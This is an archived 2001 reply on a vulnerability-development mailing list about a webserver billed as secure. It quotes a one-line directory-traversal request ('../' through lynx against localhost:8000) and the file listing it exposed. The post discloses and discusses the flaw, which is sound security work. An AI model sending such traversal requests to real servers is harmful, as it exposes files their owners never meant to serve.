Vulnerability Development: Re: Severe Vuln. in "secure" webserver.

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

Re: Severe Vuln. in "secure" webserver.

From: "Larry W. Cashdollar" <lwc () vapid dhs org>
Date: Tue, 27 Nov 2001 13:01:08 -0500 (EST)


You forgot the "http://";

-- Larry

--------------------Snip---------------------------
GOBBLES () localhost:/tmp/awhttpd$ lynx -dump localhost:8000/../ >GOBBLES
GOBBLES () localhost:/tmp/awhttpd$ cat GOBBLES

Current directory is /tmp/awhttpd/

    -rw-------    1 GOBBLES  hackers       1786 Jul 21 14:34 [1]CHANGES
    -rw-------    1 GOBBLES  hackers          0 Nov 26 09:10 [2]GOBBLES
-----------------------------------------------------

By Date By Thread

Current thread:

Severe Vuln. in "secure" webserver. vuln-dev (Nov 27)
- Re: Severe Vuln. in "secure" webserver. Renaud Deraison (Nov 27)
- Re: Severe Vuln. in "secure" webserver. Larry W. Cashdollar (Nov 27)